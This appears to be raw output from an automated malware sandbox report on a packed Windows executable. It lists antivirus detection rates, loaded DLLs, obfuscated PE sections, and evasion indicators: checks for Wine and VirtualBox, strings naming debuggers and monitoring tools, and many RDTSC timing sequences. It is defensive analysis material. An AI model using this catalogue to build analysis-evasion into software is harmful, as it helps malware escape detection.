Source: C:\Users\user\Desktop\xXe4fTmV2h.exeFile read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeFile read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeFile read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeFile read: C:\Windows\System32\drivers\etc\hosts
Source: xXe4fTmV2h.exeVirustotal: Detection: 40%
Source: xXe4fTmV2h.exeReversingLabs: Detection: 52%
Source: xXe4fTmV2h.exeString found in binary or memory: Unable to complete request for channel-process-startup
Source: xXe4fTmV2h.exeString found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeSection loaded: apphelp.dll
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeSection loaded: winmm.dll
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeSection loaded: iphlpapi.dll
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeSection loaded: cryptbase.dll
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeSection loaded: cryptsp.dll
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeSection loaded: rsaenh.dll
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeSection loaded: dhcpcsvc6.dll
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeSection loaded: dhcpcsvc.dll
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeSection loaded: dnsapi.dll
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeSection loaded: napinsp.dll
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeSection loaded: pnrpnsp.dll
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeSection loaded: wshbth.dll
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeSection loaded: nlaapi.dll
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeSection loaded: mswsock.dll
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeSection loaded: winrnr.dll
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeSection loaded: uxtheme.dll
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeSection loaded: windows.storage.dll
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeSection loaded: wldp.dll
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeSection loaded: windowscodecs.dll
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeSection loaded: napinsp.dll
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeSection loaded: pnrpnsp.dll
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeSection loaded: wshbth.dll
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeSection loaded: nlaapi.dll
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeSection loaded: winrnr.dll
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeSection loaded: kernel.appcore.dll
Source: xXe4fTmV2h.exeStatic file information: File size 4450816 > 1048576
Source: xXe4fTmV2h.exeStatic PE information: Raw size of is bigger than: 0x100000 < 0x288a00
Source: xXe4fTmV2h.exeStatic PE information: Raw size of mizvqalk is bigger than: 0x100000 < 0x1b2400

Data Obfuscation

Source: C:\Users\user\Desktop\xXe4fTmV2h.exeUnpacked PE file: 5.2.xXe4fTmV2h.exe.c00000.0.unpack :EW;.rsrc:W;.idata :W; :EW;mizvqalk:EW;acywuead:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;mizvqalk:EW;acywuead:EW;.taggant:EW;
Source: initial sampleStatic PE information: section where entry point is pointing to: .taggant
Source: xXe4fTmV2h.exeStatic PE information: real checksum: 0x441c97 should be: 0x448e8d
Source: xXe4fTmV2h.exeStatic PE information: section name:
Source: xXe4fTmV2h.exeStatic PE information: section name: .idata
Source: xXe4fTmV2h.exeStatic PE information: section name:
Source: xXe4fTmV2h.exeStatic PE information: section name: mizvqalk
Source: xXe4fTmV2h.exeStatic PE information: section name: acywuead
Source: xXe4fTmV2h.exeStatic PE information: section name: .taggant
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeCode function: 5_3_01ABF5B0 push eax; retf 5_3_01ABF5B1
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeCode function: 5_3_01ABB9F0 pushad ; retf 5_3_01ABB9F9
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeCode function: 5_3_01AAC708 push ss; iretd 5_3_01AAC709
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeCode function: 5_3_01AAE81C pushad ; iretd 5_3_01AAE81D
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeCode function: 5_3_01AB6462 push eax; ret 5_3_01AB6461
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeCode function: 5_2_00F841D0 push eax; mov dword ptr [esp], edx5_2_00F841D5
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeCode function: 5_2_00C82340 push eax; mov dword ptr [esp], 00000000h5_2_00C82343
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeCode function: 5_2_00CBC7F0 push eax; mov dword ptr [esp], 00000000h5_2_00CBC743
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeCode function: 5_2_00C40AC0 push eax; mov dword ptr [esp], 00000000h5_2_00C40AC4
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeCode function: 5_2_00C61430 push eax; mov dword ptr [esp], 00000000h5_2_00C61433
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeCode function: 5_2_00C839A0 push eax; mov dword ptr [esp], 00000000h5_2_00C839A3
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeCode function: 5_2_00C5DAD0 push eax; mov dword ptr [esp], edx5_2_00C5DAD1
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeCode function: 5_3_01ABA7F0 pushad ; retf 5_3_01ABB7D1
Source: xXe4fTmV2h.exeStatic PE information: section name: mizvqalk entropy: 7.9554844362049995

Boot Survival

Source: C:\Users\user\Desktop\xXe4fTmV2h.exeWindow searched: window name: FilemonClass
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeWindow searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeWindow searched: window name: RegmonClass
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeWindow searched: window name: FilemonClass
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeWindow searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeWindow searched: window name: Regmonclass
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeWindow searched: window name: Filemonclass
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeWindow searched: window name: PROCMON_WINDOW_CLASS

Malware Analysis System Evasion

Source: C:\Users\user\Desktop\xXe4fTmV2h.exeFile opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: xXe4fTmV2h.exe, 00000005.00000003.1289627107.0000000007680000.00000004.00001000.00020000.00000000.sdmp, xXe4fTmV2h.exe, 00000005.00000002.1426008642.0000000001171000.00000040.00000001.01000000.00000004.sdmpBinary or memory string: PROCMON.EXE
Source: xXe4fTmV2h.exe, 00000005.00000003.1289627107.0000000007680000.00000004.00001000.00020000.00000000.sdmp, xXe4fTmV2h.exe, 00000005.00000002.1426008642.0000000001171000.00000040.00000001.01000000.00000004.sdmpBinary or memory string: X64DBG.EXE
Source: xXe4fTmV2h.exe, 00000005.00000003.1289627107.0000000007680000.00000004.00001000.00020000.00000000.sdmp, xXe4fTmV2h.exe, 00000005.00000002.1426008642.0000000001171000.00000040.00000001.01000000.00000004.sdmpBinary or memory string: WINDBG.EXE
Source: xXe4fTmV2h.exe, 00000005.00000002.1426008642.0000000001171000.00000040.00000001.01000000.00000004.sdmpBinary or memory string: SYSINTERNALSNUM_PROCESSORNUM_RAMNAMEALLFREEDRIVERSNUM_DISPLAYSRESOLUTION_XRESOLUTION_Y\*RECENT_FILESPROCESSESUPTIME_MINUTESC:\WINDOWS\SYSTEM32\VBOX*.DLL01VBOX_FIRSTSYSTEM\CONTROLSET001\SERVICES\VBOXSFVBOX_SECONDC:\USERS\PUBLIC\PUBLIC_CHECKWINDBG.EXEDBGWIRESHARK.EXEPROCMON.EXEX64DBG.EXEIDA.EXEDBG_SECDBG_THIRDYADROINSTALLED_APPSSOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALLSOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALL%D%S\%SDISPLAYNAMEAPP_NAMEINDEXCREATETOOLHELP32SNAPSHOT FAILED.
Source: xXe4fTmV2h.exe, 00000005.00000003.1289627107.0000000007680000.00000004.00001000.00020000.00000000.sdmp, xXe4fTmV2h.exe, 00000005.00000002.1426008642.0000000001171000.00000040.00000001.01000000.00000004.sdmpBinary or memory string: WIRESHARK.EXE
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 148F6D6 second address: 148F6DA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 148F87A second address: 148F896 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 ja 00007FB0A5355D56h 0x00000009 jnp 00007FB0A5355D56h 0x0000000f popad 0x00000010 pop edx 0x00000011 pop eax 0x00000012 push eax 0x00000013 pushad 0x00000014 push eax 0x00000015 push edx 0x00000016 jns 00007FB0A5355D56h 0x0000001c rdtsc
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 149156F second address: 14915D3 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007FB0A4FB5B86h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b mov dword ptr [esp], eax 0x0000000e push 00000000h 0x00000010 push ecx 0x00000011 call 00007FB0A4FB5B88h 0x00000016 pop ecx 0x00000017 mov dword ptr [esp+04h], ecx 0x0000001b add dword ptr [esp+04h], 00000016h 0x00000023 inc ecx 0x00000024 push ecx 0x00000025 ret 0x00000026 pop ecx 0x00000027 ret 0x00000028 push 00000000h 0x0000002a jne 00007FB0A4FB5B98h 0x00000030 push 00000000h 0x00000032 xor edi, dword ptr [ebp+129C1A10h] 0x00000038 mov dword ptr [ebp+129C1EADh], ecx 0x0000003e push eax 0x0000003f push eax 0x00000040 push edx 0x00000041 jmp 00007FB0A4FB5B8Dh 0x00000046 rdtsc
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 14925EF second address: 1492671 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FB0A5355D67h 0x00000009 popad 0x0000000a pop eax 0x0000000b nop 0x0000000c push 00000000h 0x0000000e push edx 0x0000000f call 00007FB0A5355D58h 0x00000014 pop edx 0x00000015 mov dword ptr [esp+04h], edx 0x00000019 add dword ptr [esp+04h], 0000001Ah 0x00000021 inc edx 0x00000022 push edx 0x00000023 ret 0x00000024 pop edx 0x00000025 ret 0x00000026 push ecx 0x00000027 mov ebx, dword ptr [ebp+129C1C21h] 0x0000002d pop edi 0x0000002e clc 0x0000002f push 00000000h 0x00000031 mov ebx, dword ptr [ebp+129C2A93h] 0x00000037 mov edi, 6A8D8031h 0x0000003c push 00000000h 0x0000003e push 00000000h 0x00000040 push ebx 0x00000041 call 00007FB0A5355D58h 0x00000046 pop ebx 0x00000047 mov dword ptr [esp+04h], ebx 0x0000004b add dword ptr [esp+04h], 00000016h 0x00000053 inc ebx 0x00000054 push ebx 0x00000055 ret 0x00000056 pop ebx 0x00000057 ret 0x00000058 mov dword ptr [ebp+129C1BF7h], edi 0x0000005e push eax 0x0000005f push eax 0x00000060 push edx 0x00000061 pushad 0x00000062 push eax 0x00000063 push edx 0x00000064 rdtsc
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 149172E second address: 1491743 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 popad 0x00000006 push eax 0x00000007 jbe 00007FB0A4FB5B92h 0x0000000d jc 00007FB0A4FB5B8Ch 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 1492671 second address: 1492677 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 1492677 second address: 149267C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 1493544 second address: 14935CA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB0A5355D64h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a mov ebx, dword ptr [ebp+129C2A1Fh] 0x00000010 push 00000000h 0x00000012 push 00000000h 0x00000014 push esi 0x00000015 call 00007FB0A5355D58h 0x0000001a pop esi 0x0000001b mov dword ptr [esp+04h], esi 0x0000001f add dword ptr [esp+04h], 00000015h 0x00000027 inc esi 0x00000028 push esi 0x00000029 ret 0x0000002a pop esi 0x0000002b ret 0x0000002c add dword ptr [ebp+129C1C9Bh], edx 0x00000032 mov edi, dword ptr [ebp+129C2A8Fh] 0x00000038 jng 00007FB0A5355D5Bh 0x0000003e push 00000000h 0x00000040 push 00000000h 0x00000042 push edi 0x00000043 call 00007FB0A5355D58h 0x00000048 pop edi 0x00000049 mov dword ptr [esp+04h], edi 0x0000004d add dword ptr [esp+04h], 00000015h 0x00000055 inc edi 0x00000056 push edi 0x00000057 ret 0x00000058 pop edi 0x00000059 ret 0x0000005a xchg eax, esi 0x0000005b jmp 00007FB0A5355D5Bh 0x00000060 push eax 0x00000061 push eax 0x00000062 push edx 0x00000063 pushad 0x00000064 push eax 0x00000065 push edx 0x00000066 rdtsc
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 14935CA second address: 14935DD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FB0A4FB5B8Eh 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 149449A second address: 149449E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 149449E second address: 149453F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 je 00007FB0A4FB5B88h 0x0000000c pushad 0x0000000d popad 0x0000000e popad 0x0000000f mov dword ptr [esp], eax 0x00000012 mov dword ptr [ebp+129C1B3Fh], eax 0x00000018 add dword ptr [ebp+129C1A89h], esi 0x0000001e push 00000000h 0x00000020 push 00000000h 0x00000022 push ebx 0x00000023 call 00007FB0A4FB5B88h 0x00000028 pop ebx 0x00000029 mov dword ptr [esp+04h], ebx 0x0000002d add dword ptr [esp+04h], 00000019h 0x00000035 inc ebx 0x00000036 push ebx 0x00000037 ret 0x00000038 pop ebx 0x00000039 ret 0x0000003a mov di, cx 0x0000003d jmp 00007FB0A4FB5B8Dh 0x00000042 push 00000000h 0x00000044 push 00000000h 0x00000046 push ecx 0x00000047 call 00007FB0A4FB5B88h 0x0000004c pop ecx 0x0000004d mov dword ptr [esp+04h], ecx 0x00000051 add dword ptr [esp+04h], 00000019h 0x00000059 inc ecx 0x0000005a push ecx 0x0000005b ret 0x0000005c pop ecx 0x0000005d ret 0x0000005e clc 0x0000005f sub edi, dword ptr [ebp+129C21BEh] 0x00000065 push eax 0x00000066 pushad 0x00000067 jbe 00007FB0A4FB5B8Ch 0x0000006d push eax 0x0000006e push edx 0x0000006f jmp 00007FB0A4FB5B96h 0x00000074 rdtsc
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 149453F second address: 1494543 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 14957D9 second address: 14957DD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 14986C8 second address: 1498777 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FB0A5355D58h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov dword ptr [esp], eax 0x0000000f adc bx, 45E1h 0x00000014 push dword ptr fs:[00000000h] 0x0000001b push 00000000h 0x0000001d push esi 0x0000001e call 00007FB0A5355D58h 0x00000023 pop esi 0x00000024 mov dword ptr [esp+04h], esi 0x00000028 add dword ptr [esp+04h], 00000017h 0x00000030 inc esi 0x00000031 push esi 0x00000032 ret 0x00000033 pop esi 0x00000034 ret 0x00000035 xor dword ptr [ebp+129C1BA7h], ecx 0x0000003b mov dword ptr fs:[00000000h], esp 0x00000042 push 00000000h 0x00000044 push ebx 0x00000045 call 00007FB0A5355D58h 0x0000004a pop ebx 0x0000004b mov dword ptr [esp+04h], ebx 0x0000004f add dword ptr [esp+04h], 00000014h 0x00000057 inc ebx 0x00000058 push ebx 0x00000059 ret 0x0000005a pop ebx 0x0000005b ret 0x0000005c jmp 00007FB0A5355D5Bh 0x00000061 mov eax, dword ptr [ebp+129C175Dh] 0x00000067 stc 0x00000068 push FFFFFFFFh 0x0000006a nop 0x0000006b jmp 00007FB0A5355D69h 0x00000070 push eax 0x00000071 pushad 0x00000072 jmp 00007FB0A5355D68h 0x00000077 push eax 0x00000078 push edx 0x00000079 push esi 0x0000007a pop esi 0x0000007b rdtsc
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 14957DD second address: 14957F5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB0A4FB5B94h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 149960F second address: 1499613 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 149A6A8 second address: 149A6AC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 1499613 second address: 149961E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push ebx 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 149A786 second address: 149A78D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 149B7F2 second address: 149B7F6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 14A3A2D second address: 14A3A49 instructions: 0x00000000 rdtsc 0x00000002 jno 00007FB0A4FB5B8Eh 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push edx 0x0000000d jng 00007FB0A4FB5B86h 0x00000013 pop edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 14A3BF5 second address: 14A3BFB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 14AF6E1 second address: 14AF715 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 pushad 0x00000006 popad 0x00000007 jmp 00007FB0A4FB5B97h 0x0000000c popad 0x0000000d pushad 0x0000000e jns 00007FB0A4FB5B86h 0x00000014 ja 00007FB0A4FB5B86h 0x0000001a popad 0x0000001b pop edx 0x0000001c pop eax 0x0000001d push ecx 0x0000001e push eax 0x0000001f push edx 0x00000020 push eax 0x00000021 push edx 0x00000022 rdtsc
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 14AF715 second address: 14AF719 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 14AE4B7 second address: 14AE4BD instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 14AE4BD second address: 14AE4C3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 14AE4C3 second address: 14AE4C9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 14AE4C9 second address: 14AE4CD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 14AEA41 second address: 14AEA47 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 14AEA47 second address: 14AEA4B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 14AF3B7 second address: 14AF3BD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 14AF56B second address: 14AF571 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 14AF571 second address: 14AF575 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 14AF575 second address: 14AF57B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 14AF57B second address: 14AF590 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 je 00007FB0A4FB5B8Ch 0x0000000f rdtsc
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 14AF590 second address: 14AF596 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 14AF596 second address: 14AF59A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 14AF59A second address: 14AF5A4 instructions: 0x00000000 rdtsc 0x00000002 jc 00007FB0A5355D56h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 14B4EE5 second address: 14B4EF3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 pushad 0x00000007 popad 0x00000008 jnl 00007FB0A4FB5B86h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 14B4EF3 second address: 14B4EFD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 14B4EFD second address: 14B4F03 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 14B54FF second address: 14B5524 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB0A5355D67h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jnp 00007FB0A5355D56h 0x00000011 push ebx 0x00000012 pop ebx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 14B5524 second address: 14B5528 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 14B5528 second address: 14B552E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 14B552E second address: 14B5551 instructions: 0x00000000 rdtsc 0x00000002 jo 00007FB0A4FB5B9Ah 0x00000008 pushad 0x00000009 popad 0x0000000a jmp 00007FB0A4FB5B92h 0x0000000f pop edx 0x00000010 pop eax 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 14B5551 second address: 14B555C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 popad 0x00000007 push eax 0x00000008 push edi 0x00000009 pop edi 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 14B4AE8 second address: 14B4B09 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FB0A4FB5B97h 0x00000009 popad 0x0000000a push ecx 0x0000000b push ecx 0x0000000c pop ecx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 14B5AD3 second address: 14B5AEA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FB0A5355D63h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 14B5AEA second address: 14B5AEE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 14B5AEE second address: 14B5AFE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jbe 00007FB0A5355D56h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 14B5AFE second address: 14B5B02 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 14B5B02 second address: 14B5B06 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 14B5B06 second address: 14B5B10 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
